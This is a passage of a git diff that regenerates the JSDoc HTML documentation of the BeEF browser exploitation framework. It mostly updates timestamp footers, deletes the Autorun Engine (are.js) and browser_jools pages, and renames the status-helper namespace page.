Time) </footer> <script> prettyPrint(); </script> diff --git a/docs/are.js.html b/docs/are.js.html deleted file mode 100644 index 6e3a420567..0000000000 --- a/docs/are.js.html +++ /dev/null @@ -1,92 +0,0 @@ -<!DOCTYPE html> -<html lang="en"> -<head> - <meta charset="utf-8"> - <title>JSDoc: Source: are.js - - - - - - - - - - -
- -

Source: are.js

- - - - - - -
-
- 
//
-// Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
-// Browser Exploitation Framework (BeEF) - https://beefproject.com
-// See the file 'doc/COPYING' for copying permission
-//
-
-/** 
- * A series of functions that handle statuses, returns a number based on the function called.
- * @namespace beef.are
- */
-
-beef.are = {
-  /**
-   * A function for handling a success status
-   * @memberof beef.are
-   * @method status_success 
-   * @return {number} 1
-   */
-  status_success: function(){
-    return 1;
-  },
-  /**
-   * A function for handling an unknown status
-   * @memberof beef.are
-   * @method status_unknown 
-   * @return {number} 0
-   */  
-  status_unknown: function(){
-    return 0;
-  },
-  /**
-   * A function for handling an error status
-   * @memberof beef.are
-   * @method status_error 
-   * @return {number} -1
-   */  
-  status_error: function(){
-    return -1;
-  }
-};
-beef.regCmp("beef.are");
-
-
-
- - - - -
- - - -
- - - - - - - diff --git a/docs/beef.browser.cookie.html b/docs/beef.browser.cookie.html index 2e73085452..8ef19d859b 100644 --- a/docs/beef.browser.cookie.html +++ b/docs/beef.browser.cookie.html @@ -628,13 +628,13 @@

(static) se
- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.browser.html b/docs/beef.browser.html index 3e5687e139..c30abfe0c8 100644 --- a/docs/beef.browser.html +++ b/docs/beef.browser.html @@ -30430,13 +30430,13 @@

(static) type
- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.browser.popup.html b/docs/beef.browser.popup.html index 075b63c223..1899fce5b1 100644 --- a/docs/beef.browser.popup.html +++ b/docs/beef.browser.popup.html @@ -208,13 +208,13 @@

(static)
- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.dom.html b/docs/beef.dom.html index 4d19e9c3cd..855de6b2a4 100644 --- a/docs/beef.dom.html +++ b/docs/beef.dom.html @@ -3673,13 +3673,13 @@
Returns:

- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.encode.base64.html b/docs/beef.encode.base64.html index e18d53051e..6f399ff2af 100644 --- a/docs/beef.encode.base64.html +++ b/docs/beef.encode.base64.html @@ -725,13 +725,13 @@
Returns:

- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.encode.json.html b/docs/beef.encode.json.html index 660c04e735..420008dc61 100644 --- a/docs/beef.encode.json.html +++ b/docs/beef.encode.json.html @@ -377,13 +377,13 @@
Parameters:

- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.geolocation.html b/docs/beef.geolocation.html index 04f5f5af74..ec1f64a15e 100644 --- a/docs/beef.geolocation.html +++ b/docs/beef.geolocation.html @@ -563,13 +563,13 @@
Returns:

- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.hardware.html b/docs/beef.hardware.html index 2e9ca6143c..b4b7fb4c72 100644 --- a/docs/beef.hardware.html +++ b/docs/beef.hardware.html @@ -2071,13 +2071,13 @@
Returns:

- Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
diff --git a/docs/beef.init.html b/docs/beef.init.html index 5f0dfdfe9b..2d3fa252e2 100644 --- a/docs/beef.init.html +++ b/docs/beef.init.html @@ -128,7 +128,6 @@

(static) be
  • browser details (see browser.js) are sent back to the "/init" handler
  • the polling starts (checks for new commands, and execute them)
  • the logger component is initialized (see logger.js)
    • -
  • the Autorun Engine is initialized (see are.js)
    • @@ -173,7 +172,7 @@

    (static) be
    Source:
    @@ -471,13 +470,13 @@

    (static) <
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.js.html b/docs/beef.js.html index ab86880dc6..f41c7ea959 100644 --- a/docs/beef.js.html +++ b/docs/beef.js.html @@ -120,13 +120,13 @@

    Source: beef.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.logger.html b/docs/beef.logger.html index 91ba39df2d..90379f9367 100644 --- a/docs/beef.logger.html +++ b/docs/beef.logger.html @@ -2153,13 +2153,13 @@

    (static) wi
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.mitb.html b/docs/beef.mitb.html index a14a2fb79b..a2a7e36d39 100644 --- a/docs/beef.mitb.html +++ b/docs/beef.mitb.html @@ -911,13 +911,13 @@

    (static) sniff<
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.connection.html b/docs/beef.net.connection.html index 8c9c26ae21..9d4ec1f42b 100644 --- a/docs/beef.net.connection.html +++ b/docs/beef.net.connection.html @@ -354,13 +354,13 @@

    Example

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.cors.html b/docs/beef.net.cors.html index ca525f5d05..cc7fb49c10 100644 --- a/docs/beef.net.cors.html +++ b/docs/beef.net.cors.html @@ -437,13 +437,13 @@

    (static) res
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.dns.html b/docs/beef.net.dns.html index e57895a5b8..e9b474c316 100644 --- a/docs/beef.net.dns.html +++ b/docs/beef.net.dns.html @@ -310,13 +310,13 @@

    Parameters:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.html b/docs/beef.net.html index 60aef89bf1..315bb47316 100644 --- a/docs/beef.net.html +++ b/docs/beef.net.html @@ -2373,13 +2373,13 @@

    (static) strea
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.local.html b/docs/beef.net.local.html index 36b3b32c54..a79f010224 100644 --- a/docs/beef.net.local.html +++ b/docs/beef.net.local.html @@ -434,13 +434,13 @@

    (static)
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.portscanner.html b/docs/beef.net.portscanner.html index 3c1e2fa752..52d3229d3e 100644 --- a/docs/beef.net.portscanner.html +++ b/docs/beef.net.portscanner.html @@ -489,13 +489,13 @@
    Parameters:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.requester.html b/docs/beef.net.requester.html index 9d287d829c..2ea77b6bf9 100644 --- a/docs/beef.net.requester.html +++ b/docs/beef.net.requester.html @@ -262,13 +262,13 @@
    Parameters:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.net.xssrays.html b/docs/beef.net.xssrays.html index e2f7060780..95b0fe1cb1 100644 --- a/docs/beef.net.xssrays.html +++ b/docs/beef.net.xssrays.html @@ -758,13 +758,13 @@
    Parameters:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.os.html b/docs/beef.os.html index 5531ffd423..7b5a913a5b 100644 --- a/docs/beef.os.html +++ b/docs/beef.os.html @@ -4183,13 +4183,13 @@
    Returns:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.session.html b/docs/beef.session.html index 2ee5c990e2..64df6d2520 100644 --- a/docs/beef.session.html +++ b/docs/beef.session.html @@ -385,13 +385,13 @@

    (static)
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.are.html b/docs/beef.status.html similarity index 52% rename from docs/beef.are.html rename to docs/beef.status.html index 5db106fcc9..bab5827244 100644 --- a/docs/beef.are.html +++ b/docs/beef.status.html @@ -2,7 +2,7 @@ - JSDoc: Namespace: are + JSDoc: Namespace: status @@ -17,7 +17,7 @@
    -

    Namespace: are

    +

    Namespace: status

    @@ -28,7 +28,7 @@

    Namespace: are

    -

    are

    +

    status

    @@ -37,7 +37,8 @@

    are

    -

    A series of functions that handle statuses, returns a number based on the function called.

    +

    Status code helpers for module command results. +Modules use these when sending results back to the BeEF server.

    @@ -72,7 +73,7 @@

    are

    Source:
    @@ -111,7 +112,7 @@

    Methods

    -

    (static) status_error() → {number}

    +

    (static) error() → {number}

    @@ -119,7 +120,7 @@

    (static) -

    A function for handling an error status

    +

    Error status code

    @@ -163,7 +164,7 @@

    (static) Source:
    @@ -221,7 +222,7 @@

    Returns:
    -

    (static) status_success() → {number}

    +

    (static) success() → {number}

    @@ -229,7 +230,7 @@

    (static) -

    A function for handling a success status

    +

    Success status code

    @@ -273,7 +274,7 @@

    (static) Source:
    @@ -331,7 +332,7 @@
    Returns:
    -

    (static) status_unknown() → {number}

    +

    (static) unknown() → {number}

    @@ -339,7 +340,7 @@

    (static) -

    A function for handling an unknown status

    +

    Unknown status code

    @@ -383,7 +384,7 @@

    (static) Source:
    @@ -451,13 +452,13 @@
    Returns:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.timeout.html b/docs/beef.timeout.html index 5447714425..ebe1eb7f89 100644 --- a/docs/beef.timeout.html +++ b/docs/beef.timeout.html @@ -211,13 +211,13 @@

    (static) s
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.updater.html b/docs/beef.updater.html index 3e28340c98..797833bf30 100644 --- a/docs/beef.updater.html +++ b/docs/beef.updater.html @@ -716,13 +716,13 @@

    Example

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.webrtc.html b/docs/beef.webrtc.html index c0ffd57056..c4bd6fd7e1 100644 --- a/docs/beef.webrtc.html +++ b/docs/beef.webrtc.html @@ -3056,13 +3056,13 @@

    (static)
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/beef.websocket.html b/docs/beef.websocket.html index 4ca714f503..ba3f2797c3 100644 --- a/docs/beef.websocket.html +++ b/docs/beef.websocket.html @@ -484,13 +484,13 @@

    (static) start<
    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/browser.js.html b/docs/browser.js.html index 359bb80eba..4fc0fc22f6 100644 --- a/docs/browser.js.html +++ b/docs/browser.js.html @@ -4707,13 +4707,13 @@

    Source: browser.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/browser_cookie.js.html b/docs/browser_cookie.js.html index c818ed0047..3f65830fb7 100644 --- a/docs/browser_cookie.js.html +++ b/docs/browser_cookie.js.html @@ -157,13 +157,13 @@

    Source: browser/cookie.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/browser_jools.html b/docs/browser_jools.html deleted file mode 100644 index 550c23236e..0000000000 --- a/docs/browser_jools.html +++ /dev/null @@ -1,1165 +0,0 @@ - - - - - JSDoc: Namespace: browser_jools - - - - - - - - - - -
    - -

    Namespace: browser_jools

    - - - - - - -
    - -
    - -

    browser_jools

    - - -
    - -
    -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - -
    - - - - - - - - - - - - - - -

    Members

    - - - -

    (static) exports.version

    - - - - -
    -

    version

    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - -

    (static) require.resolve

    - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - -

    Methods

    - - - - - - - -

    (static) Jools(rules)

    - - - - - - -
    -

    Jools constructor.

    -

    A rule consists of:

    -
      -
    • Descriptive name
      • -
    • One or more conditions
      • -
    • One or more consequences, which are fired when all conditions evaluate to true.
      • -
    -
    - - - - - - - - - -
    Parameters:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameTypeDescription
    rules - - -Object - - - -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) module.exports.paramNames(f)

    - - - - - - -
    -

    Returns an array of parameter names of the function f

    -
    - - - - - - - - - -
    Parameters:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameTypeDescription
    f - - -function - - - -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) module.exports.paramsToArguments(obj, params)

    - - - - - - -
    -

    Creates an array of arguments

    -
    - - - - - - - - - -
    Parameters:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameTypeDescription
    obj - - -Object - - - -
    params - - -Array - - - -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) normalizeArray(parts, allowAboveRoot)

    - - - - - - -
    -

    resolves . and .. elements in a path array with directory names there -must be no slashes, empty elements, or device names (c:) in the array -(so also no leading and trailing slashes - it does not distinguish -relative and absolute paths)

    -
    - - - - - - - - - -
    Parameters:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameTypeDescription
    parts - -
    allowAboveRoot - -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) require(file, cwd)

    - - - - - - - - - - - - - - -
    Parameters:
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    NameTypeDescription
    file - -
    cwd - -
    - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) require.alias()

    - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -

    (static) require.define()

    - - - - - - - - - - - - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    Source:
    -
    - - - - - - - -
    - - - - - - - - - - - - - - - - - - - - - - - - - - -
    - -
    - - - - -
    - - - -
    - -
    - Documentation generated by JSDoc 3.6.3 on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time) -
    - - - - - \ No newline at end of file diff --git a/docs/browser_popup.js.html b/docs/browser_popup.js.html index 8d2575447d..e98019da6a 100644 --- a/docs/browser_popup.js.html +++ b/docs/browser_popup.js.html @@ -64,13 +64,13 @@

    Source: browser/popup.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/dom.js.html b/docs/dom.js.html index 916ac7950d..3c9d9be79a 100644 --- a/docs/dom.js.html +++ b/docs/dom.js.html @@ -539,13 +539,13 @@

    Source: dom.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/encode_base64.js.html b/docs/encode_base64.js.html index 5d1bfb5296..54aee2ce5e 100644 --- a/docs/encode_base64.js.html +++ b/docs/encode_base64.js.html @@ -208,13 +208,13 @@

    Source: encode/base64.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/encode_json.js.html b/docs/encode_json.js.html index 586569f003..bfb3db3bac 100644 --- a/docs/encode_json.js.html +++ b/docs/encode_json.js.html @@ -176,13 +176,13 @@

    Source: encode/json.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/geolocation.js.html b/docs/geolocation.js.html index 0dbdb24cac..740b940872 100644 --- a/docs/geolocation.js.html +++ b/docs/geolocation.js.html @@ -144,13 +144,13 @@

    Source: geolocation.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/global.html b/docs/global.html index 9729e42c9e..dab0ca793f 100644 --- a/docs/global.html +++ b/docs/global.html @@ -186,13 +186,13 @@
    Type:

    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/hardware.js.html b/docs/hardware.js.html index 436028ae5d..1d8cfab9a6 100644 --- a/docs/hardware.js.html +++ b/docs/hardware.js.html @@ -353,13 +353,13 @@

    Source: hardware.js


    - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
    diff --git a/docs/index.html b/docs/index.html index e420cbdba1..c866572722 100644 --- a/docs/index.html +++ b/docs/index.html @@ -59,7 +59,7 @@

    Get Involved

    Bugs: https://github.com/beefproject/beef/issues

    Security Bugs: security@beefproject.com

    Twitter: @beefproject

    -

    Discord: https://discord.gg/ugmKmHarKc

    +

    Discord: https://discord.gg/25wT2P8pwx

    Requirements

    • Operating System: Mac OSX 10.5.0 or higher / modern Linux. Note: Windows is not supported.
      • @@ -96,13 +96,13 @@

      Usage


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/init.js.html b/docs/init.js.html index 76a5150e73..ac8fddbd02 100644 --- a/docs/init.js.html +++ b/docs/init.js.html @@ -94,7 +94,6 @@

      Source: init.js

      * - browser details (see browser.js) are sent back to the "/init" handler * - the polling starts (checks for new commands, and execute them) * - the logger component is initialized (see logger.js) - * - the Autorun Engine is initialized (see are.js) * @memberof beef.init */ function beef_init() { @@ -126,13 +125,13 @@

      Source: init.js


      - Documentation generated by JSDoc 4.0.4 on Wed Dec 25 2024 12:42:36 GMT+1000 (Australian Eastern Standard Time) + Documentation generated by JSDoc 4.0.5 on Wed Mar 11 2026 18:19:34 GMT+1000 (Australian Eastern Standard Time)
      diff --git a/docs/lib_browser_jools.js.html b/docs/lib_browser_jools.js.html deleted file mode 100644 index 4b1909db06..0000000000 --- a/docs/lib_browser_jools.js.html +++ /dev/null @@ -1,1598 +0,0 @@ - - - - - JSDoc: Source: lib/browser_jools.js - - - - - - - - - - -
      - -

      Source: lib/browser_jools.js

      - - - - - - -
      -
      - 
      /**
- * @namespace browser_jools
- */
-
-/**
- * @memberof browser_jools
- * @param file 
- * @param cwd 
- */
-var require = function (file, cwd) {
-    var resolved = require.resolve(file, cwd || '/');
-    var mod = require.modules[resolved];
-    if (!mod) throw new Error(
-        'Failed to resolve module ' + file + ', tried ' + resolved
-    );
-    var res = mod._cached ? mod._cached : mod();
-    return res;
-}
-
-require.paths = [];
-require.modules = {};
-require.extensions = [".js",".coffee"];
-
-require._core = {
-    'assert': true,
-    'events': true,
-    'fs': true,
-    'path': true,
-    'vm': true
-};
-/**
- * @memberof browser_jools
- */
-require.resolve = (function () {
-    return function (x, cwd) {
-        if (!cwd) cwd = '/';
-        
-        if (require._core[x]) return x;
-        var path = require.modules.path();
-        cwd = path.resolve('/', cwd);
-        var y = cwd || '/';
-        
-        if (x.match(/^(?:\.\.?\/|\/)/)) {
-            var m = loadAsFileSync(path.resolve(y, x))
-                || loadAsDirectorySync(path.resolve(y, x));
-            if (m) return m;
-        }
-        
-        var n = loadNodeModulesSync(x, y);
-        if (n) return n;
-        
-        throw new Error("Cannot find module '" + x + "'");
-        
-        function loadAsFileSync (x) {
-            if (require.modules[x]) {
-                return x;
-            }
-            
-            for (var i = 0; i < require.extensions.length; i++) {
-                var ext = require.extensions[i];
-                if (require.modules[x + ext]) return x + ext;
-            }
-        }
-        
-        function loadAsDirectorySync (x) {
-            x = x.replace(/\/+$/, '');
-            var pkgfile = x + '/package.json';
-            if (require.modules[pkgfile]) {
-                var pkg = require.modules[pkgfile]();
-                var b = pkg.browserify;
-                if (typeof b === 'object' && b.main) {
-                    var m = loadAsFileSync(path.resolve(x, b.main));
-                    if (m) return m;
-                }
-                else if (typeof b === 'string') {
-                    var m = loadAsFileSync(path.resolve(x, b));
-                    if (m) return m;
-                }
-                else if (pkg.main) {
-                    var m = loadAsFileSync(path.resolve(x, pkg.main));
-                    if (m) return m;
-                }
-            }
-            
-            return loadAsFileSync(x + '/index');
-        }
-        
-        function loadNodeModulesSync (x, start) {
-            var dirs = nodeModulesPathsSync(start);
-            for (var i = 0; i < dirs.length; i++) {
-                var dir = dirs[i];
-                var m = loadAsFileSync(dir + '/' + x);
-                if (m) return m;
-                var n = loadAsDirectorySync(dir + '/' + x);
-                if (n) return n;
-            }
-            
-            var m = loadAsFileSync(x);
-            if (m) return m;
-        }
-        
-        function nodeModulesPathsSync (start) {
-            var parts;
-            if (start === '/') parts = [ '' ];
-            else parts = path.normalize(start).split('/');
-            
-            var dirs = [];
-            for (var i = parts.length - 1; i >= 0; i--) {
-                if (parts[i] === 'node_modules') continue;
-                var dir = parts.slice(0, i + 1).join('/') + '/node_modules';
-                dirs.push(dir);
-            }
-            
-            return dirs;
-        }
-    };
-})();
-/**
- * @memberof browser_jools
- */
-require.alias = function (from, to) {
-    var path = require.modules.path();
-    var res = null;
-    try {
-        res = require.resolve(from + '/package.json', '/');
-    }
-    catch (err) {
-        res = require.resolve(from, '/');
-    }
-    var basedir = path.dirname(res);
-    
-    var keys = (Object.keys || function (obj) {
-        var res = [];
-        for (var key in obj) res.push(key)
-        return res;
-    })(require.modules);
-    
-    for (var i = 0; i < keys.length; i++) {
-        var key = keys[i];
-        if (key.slice(0, basedir.length + 1) === basedir + '/') {
-            var f = key.slice(basedir.length);
-            require.modules[to + f] = require.modules[basedir + f];
-        }
-        else if (key === basedir) {
-            require.modules[to] = require.modules[basedir];
-        }
-    }
-};
-/**
- * @memberof browser_jools
- */
-require.define = function (filename, fn) {
-    var dirname = require._core[filename]
-        ? ''
-        : require.modules.path().dirname(filename)
-    ;
-    
-    var require_ = function (file) {
-        return require(file, dirname)
-    };
-    require_.resolve = function (name) {
-        return require.resolve(name, dirname);
-    };
-    require_.modules = require.modules;
-    require_.define = require.define;
-    var module_ = { exports : {} };
-    
-    require.modules[filename] = function () {
-        require.modules[filename]._cached = module_.exports;
-        fn.call(
-            module_.exports,
-            require_,
-            module_,
-            module_.exports,
-            dirname,
-            filename
-        );
-        require.modules[filename]._cached = module_.exports;
-        return module_.exports;
-    };
-};
-
-if (typeof process === 'undefined') process = {};
-
-if (!process.nextTick) process.nextTick = (function () {
-    var queue = [];
-    var canPost = typeof window !== 'undefined'
-        && window.postMessage && window.addEventListener
-    ;
-    
-    if (canPost) {
-        window.addEventListener('message', function (ev) {
-            if (ev.source === window && ev.data === 'browserify-tick') {
-                ev.stopPropagation();
-                if (queue.length > 0) {
-                    var fn = queue.shift();
-                    fn();
-                }
-            }
-        }, true);
-    }
-    
-    return function (fn) {
-        if (canPost) {
-            queue.push(fn);
-            window.postMessage('browserify-tick', '*');
-        }
-        else setTimeout(fn, 0);
-    };
-})();
-
-if (!process.title) process.title = 'browser';
-
-if (!process.binding) process.binding = function (name) {
-    if (name === 'evals') return require('vm')
-    else throw new Error('No such module')
-};
-
-if (!process.cwd) process.cwd = function () { return '.' };
-
-if (!process.env) process.env = {};
-if (!process.argv) process.argv = [];
-
-require.define("path", function (require, module, exports, __dirname, __filename) {
